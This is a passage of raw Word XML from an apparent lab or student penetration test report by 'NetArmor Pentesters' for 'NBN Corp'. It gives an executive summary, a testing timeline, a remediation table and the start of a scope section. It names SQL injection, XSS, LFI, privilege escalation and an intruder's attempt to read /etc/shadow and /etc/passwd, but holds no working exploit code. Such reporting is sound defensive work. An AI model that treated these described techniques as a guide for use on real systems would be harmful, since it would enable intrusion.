      <w:r w:rsidR="00914447">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>more,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> analysis of the </w:t>
      </w:r>
      <w:r w:rsidR="00914447">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd.log on the nbn client shows that the nbn client was accessed on November 11 by an unauthorized user with the IP address </w:t>
      </w:r>
      <w:r w:rsidR="00914447" w:rsidRPr="00914447">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>192.168.1.24</w:t>
      </w:r>
      <w:r w:rsidR="00914447">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>. The attacker attempted</w:t>
      </w:r>
      <w:r w:rsidR="002916F9">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00914447">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> retrieve the /etc/shadow and /etc/passwd file</w:t>
      </w:r>
      <w:r w:rsidR="002916F9">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">, but only managed to download the /etc/passwd file. The critical nature of the findings indicates that NBN Corp </w:t>
      </w:r>
      <w:r w:rsidR="00890DE9">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">must </w:t>
      </w:r>
      <w:r w:rsidR="002916F9">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">immediately apply security </w:t>
      </w:r>
      <w:r w:rsidR="00890DE9">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">fixes to </w:t>
      </w:r>
      <w:r w:rsidR="002916F9">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00914447">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>nsure data confidentiality, integrity, and availability</w:t>
      </w:r>
      <w:r w:rsidR="002916F9">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> of NBN services.</w:t>
      </w:r>
      <w:r w:rsidR="00CF76BE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Our top security recommendations are the use of complex passwords, sanitization of user inputs, and updating outdated software components. A full comprehensive list of security recommendations is provided in the recommendation section of the report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62676D7B" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3"/>
    <w:p w14:paraId="3266DE4A" w14:textId="77777777" w:rsidR="002916F9" w:rsidRDefault="002916F9"/>
    <w:p w14:paraId="2827BD3E" w14:textId="77777777" w:rsidR="002916F9" w:rsidRDefault="002916F9"/>
    <w:p w14:paraId="1851E777" w14:textId="77777777" w:rsidR="002916F9" w:rsidRDefault="002916F9"/>
    <w:p w14:paraId="74A2EC54" w14:textId="4E1736E7" w:rsidR="00220DD3" w:rsidRDefault="00B41A85" w:rsidP="00CF76BE">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C76750">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidR="00CF76BE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76750">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> that this assessment may not disclose all vulnerabilities that are present on the systems within the scope. Any changes made to the environment during the period of testing may affect the results of the assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29515006" w14:textId="35904D9D" w:rsidR="00220DD3" w:rsidRDefault="000F2981">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc153834518"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="2F77B33F" w14:textId="0EC83371" w:rsidR="00220DD3" w:rsidRDefault="00976619">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc153834519"/>
      <w:r>
        <w:t>Test Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="5BB81C38" w14:textId="2081CBD1" w:rsidR="0017115B" w:rsidRDefault="0017115B">
      <w:r>
        <w:t>NetArmor Pentesters was contracted by N</w:t>
      </w:r>
      <w:r w:rsidR="00640AE7">
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">N Corp to conduct a penetration test </w:t>
      </w:r>
      <w:r w:rsidR="00FD6594">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00640AE7">
        <w:t xml:space="preserve"> NBN Corp to secure their systems. Two server images were provided to be analyzed, nbnwebserver and nbnclient. Furthermore, NBN Corp have expressed their </w:t>
      </w:r>
      <w:r w:rsidR="00C6750E">
        <w:t>suspicions</w:t>
      </w:r>
      <w:r w:rsidR="00640AE7">
        <w:t xml:space="preserve"> that bad actors are still targeting their external-facing web servers.</w:t>
      </w:r>
      <w:r w:rsidR="00F961EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D73D2" w14:textId="77777777" w:rsidR="00D90E26" w:rsidRDefault="00D90E26"/>
    <w:p w14:paraId="3B632675" w14:textId="574F3EA8" w:rsidR="00883C02" w:rsidRPr="00883C02" w:rsidRDefault="00D90E26">
      <w:r>
        <w:t>To meet the demands, NetArmor</w:t>
      </w:r>
      <w:r w:rsidR="00D962D3">
        <w:t xml:space="preserve"> used port scanning to retrieve more information about NBN’s systems. </w:t>
      </w:r>
      <w:r w:rsidR="00863008">
        <w:t>To test the security of NBN’s</w:t>
      </w:r>
      <w:r w:rsidR="00D962D3">
        <w:t xml:space="preserve"> web applications</w:t>
      </w:r>
      <w:r w:rsidR="00863008">
        <w:t xml:space="preserve">, common web vulnerabilities such as </w:t>
      </w:r>
      <w:r w:rsidR="00D962D3">
        <w:t xml:space="preserve">SQL injection, Cross Site Scripting, Local File inclusion, and </w:t>
      </w:r>
      <w:r w:rsidR="00863008">
        <w:t xml:space="preserve">cookie hijacking were tested. </w:t>
      </w:r>
      <w:r w:rsidR="00883C02">
        <w:t xml:space="preserve">After gaining shell access, privilege escalation payloads were tested to gain root access on the servers. The penetration test showed that the nbn web server and the nbn client </w:t>
      </w:r>
      <w:r w:rsidR="00883C02" w:rsidRPr="00DB4D1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>did not pass our security benchmarks and ha</w:t>
      </w:r>
      <w:r w:rsidR="00883C02">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidR="00883C02" w:rsidRPr="00DB4D1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> a high risk score</w:t>
      </w:r>
      <w:r w:rsidR="00883C02">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049ED909" w14:textId="4F52DD31" w:rsidR="00C6750E" w:rsidRDefault="00C6750E" w:rsidP="00C6750E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc153834520"/>
      <w:r>
        <w:t>Timeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="21109C2E" w14:textId="03DC5281" w:rsidR="00C6750E" w:rsidRDefault="00C6750E">
      <w:r>
        <w:t>The penetration test took 3 days to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B792A70" w14:textId="77777777" w:rsidR="006D6867" w:rsidRPr="00D0018F" w:rsidRDefault="00C6750E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0018F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Day 1: December 15, 2023</w:t>
      </w:r>
      <w:r w:rsidR="006D6867" w:rsidRPr="00D0018F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639BFB63" w14:textId="33E37100" w:rsidR="006D6867" w:rsidRDefault="006D6867" w:rsidP="006D6867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10:00 – 10:30 AM: </w:t>
      </w:r>
      <w:r w:rsidR="00C6750E">
        <w:t>Reconnaissance and Network scanning of nbnwebserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DA5DF1" w14:textId="601D5BB7" w:rsidR="00C6750E" w:rsidRDefault="006D6867" w:rsidP="006D6867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10:30 – 12:30 PM: </w:t>
      </w:r>
      <w:r w:rsidR="00C6750E">
        <w:t xml:space="preserve">Exploitation of both </w:t>
      </w:r>
      <w:r>
        <w:t>production</w:t>
      </w:r>
      <w:r w:rsidR="00C6750E">
        <w:t xml:space="preserve"> and staging </w:t>
      </w:r>
      <w:r>
        <w:t>websites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1993F584" w14:textId="3F4344E1" w:rsidR="006D6867" w:rsidRDefault="006D6867" w:rsidP="00D0018F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12:30 – 03:00 PM: Exploitation of NPNwebserver </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F72577E" w14:textId="77777777" w:rsidR="00D0018F" w:rsidRDefault="00D0018F" w:rsidP="00D0018F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D949B63" w14:textId="3AB911C0" w:rsidR="006D6867" w:rsidRPr="00D0018F" w:rsidRDefault="006D6867" w:rsidP="006D6867">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0018F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Day 2: December 16, 2023:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E97B2A" w14:textId="675C1AD9" w:rsidR="006D6867" w:rsidRDefault="006D6867" w:rsidP="006D6867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>10:00 – 10:30 AM: Reconnaissance and Network scanning of nbnclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B9EEB" w14:textId="59E901FC" w:rsidR="006D6867" w:rsidRDefault="006D6867" w:rsidP="006D6867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>10:30 – 12:30 PM: Exploitation of NPNclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399A4ED" w14:textId="77777777" w:rsidR="00C6750E" w:rsidRDefault="00C6750E"/>
    <w:p w14:paraId="50E8F48F" w14:textId="689D02F8" w:rsidR="00D0018F" w:rsidRPr="00D0018F" w:rsidRDefault="00D0018F" w:rsidP="00D0018F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0018F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Day 3: December 17, 2023:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F73F178" w14:textId="2FC2BFA3" w:rsidR="00D0018F" w:rsidRDefault="00D0018F" w:rsidP="00D0018F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>10:00 – 11:30 AM: Checking nbnwebserver logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1878860F" w14:textId="1D537D0C" w:rsidR="00D0018F" w:rsidRDefault="00D0018F" w:rsidP="00D0018F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>12:00 – 02:00 PM: Checking nbnclient logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A51D0" w14:textId="2671C6C1" w:rsidR="00D0018F" w:rsidRDefault="00D0018F" w:rsidP="00D0018F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>02:00 – 09:00 PM: Finalizing Pentesting Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0CD98F" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc153834521"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Areas for Improvement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="587D4646" w14:textId="61D03250" w:rsidR="00DD31D4" w:rsidRPr="001F74D3" w:rsidRDefault="00863008" w:rsidP="00863008">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Due to the critical vulnerabilities found, NetArmor recommends NBN Corp take immediate actions to improve the security of the network</w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_n20bhnm5z36"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:t>. The major flaws</w:t>
      </w:r>
      <w:r w:rsidR="00DD31D4">
        <w:t xml:space="preserve"> which were found in the security assessment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are listed </w:t>
      </w:r>
      <w:r w:rsidR="00DD31D4">
        <w:t>in the table below with actions of remediation.</w:t>
      </w:r>
      <w:r w:rsidR="001F74D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F74D3">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>A full comprehensive list of security recommendations is provided in the recommendation section of the report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C3CC5" w14:textId="77777777" w:rsidR="001F74D3" w:rsidRDefault="001F74D3" w:rsidP="00863008"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2075"/>
        <w:gridCol w:w="3230"/>
        <w:gridCol w:w="4055"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD31D4" w14:paraId="0A9AD2D3" w14:textId="77777777" w:rsidTr="00534794">
        <w:trPr>
          <w:trHeight w:val="611"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2075" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="127DCBC7" w14:textId="37D80FA8" w:rsidR="00DD31D4" w:rsidRDefault="00DD31D4" w:rsidP="00DD31D4">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="323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EFF4092" w14:textId="3FA2FE52" w:rsidR="00DD31D4" w:rsidRDefault="00DD31D4" w:rsidP="00DD31D4">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="215D127C" w14:textId="4111601C" w:rsidR="00DD31D4" w:rsidRDefault="00DD31D4" w:rsidP="00DD31D4">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD31D4" w14:paraId="51B45571" w14:textId="77777777" w:rsidTr="000C13F1">
        <w:trPr>
          <w:trHeight w:val="2627"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2075" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7096AFD5" w14:textId="10347542" w:rsidR="00DD31D4" w:rsidRDefault="00DD31D4" w:rsidP="000C13F1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Weak Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3230" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FE46DA5" w14:textId="01433B44" w:rsidR="00DD31D4" w:rsidRDefault="00534794" w:rsidP="000C13F1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00534794">
              <w:t>The login information for two NBN employees was compromised due to their use of common words that were present in publicly available data dump</w:t>
            </w:r>
            <w:r>
              <w:t>s.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="594F491A" w14:textId="14E1F1B9" w:rsidR="00DD31D4" w:rsidRDefault="00534794" w:rsidP="000C13F1">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="baseline"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>It is recommended that the passwords include a combination of upper- and lower-case letters, numbers, and special characters. Ideally, it should be lengthy, unique, and not easily associated with personal information like names or birthdates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD31D4" w14:paraId="4F7A14CB" w14:textId="77777777" w:rsidTr="000C13F1">
        <w:trPr>
          <w:trHeight w:val="2870"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2075" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E3EB894" w14:textId="681A4031" w:rsidR="00DD31D4" w:rsidRDefault="00534794" w:rsidP="000C13F1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exposed </w:t>
            </w:r>
            <w:r w:rsidR="00926AA3">
              <w:t>Staging</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3230" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="173BC828" w14:textId="17649348" w:rsidR="00DD31D4" w:rsidRDefault="00534794" w:rsidP="000C13F1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The production server was vulnerable to numerous vulnerabilities such as SQL injection, XSS, LFI, and more. Exploitation of the </w:t>
            </w:r>
            <w:r w:rsidR="002726EA">
              <w:t>development</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> server provided intel on exploiting the </w:t>
            </w:r>
            <w:r w:rsidR="002726EA">
              <w:t>production server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B7A5775" w14:textId="7B49B7AD" w:rsidR="00DD31D4" w:rsidRDefault="002726EA" w:rsidP="000C13F1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Place</w:t>
            </w:r>
            <w:r w:rsidR="00926AA3">
              <w:t xml:space="preserve"> strong</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> authentication on the </w:t>
            </w:r>
            <w:r w:rsidR="00926AA3">
              <w:t xml:space="preserve">staging server so that only authorized users </w:t>
            </w:r>
            <w:r w:rsidR="001F74D3">
              <w:t>can</w:t>
            </w:r>
            <w:r w:rsidR="00926AA3">
              <w:t xml:space="preserve"> access it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD31D4" w14:paraId="4981DE09" w14:textId="77777777" w:rsidTr="000C13F1">
        <w:trPr>
          <w:trHeight w:val="2330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2075" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="197CA22A" w14:textId="6FE511E8" w:rsidR="00DD31D4" w:rsidRDefault="005E10E3" w:rsidP="000C13F1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Outdated Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3230" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D65E6BE" w14:textId="43EF286C" w:rsidR="00DD31D4" w:rsidRDefault="005E10E3" w:rsidP="000C13F1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>The version of Linux found on the webserver and the client were found to be vulnerable to a publicly known exploit which allowed the attacker to gain root access on the servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2951FDC9" w14:textId="510ACDF3" w:rsidR="00DD31D4" w:rsidRDefault="005E10E3" w:rsidP="000C13F1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Upgrade the Linux versions to the latest version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="191060A9" w14:textId="28A4E1F5" w:rsidR="00220DD3" w:rsidRDefault="00B41A85" w:rsidP="00863008">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1245DF1F" w14:textId="175F0BF4" w:rsidR="001F74D3" w:rsidRDefault="001F74D3" w:rsidP="001F74D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc153834522"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="6642B176" w14:textId="099EFB9A" w:rsidR="00220DD3" w:rsidRDefault="00B41A85" w:rsidP="001F74D3">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>All testing was based on the scope as defined in the Request For Proposal (RFP) and official written communications by NBN Corp. The items in scope are listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B748020" w14:textId="2AF5C35C" w:rsidR="001F74D3" w:rsidRPr="001F74D3" w:rsidRDefault="001F74D3" w:rsidP="001F74D3">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F74D3">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Provided NBN Networks</w:t>
      </w:r>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4579"/>
        <w:gridCol w:w="4781"/>
      </w:tblGrid>
      <w:tr w:rsidR="00220DD3" w14:paraId="68024AC1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4579" w:type="dxa"/>
            <w:tcBorders>
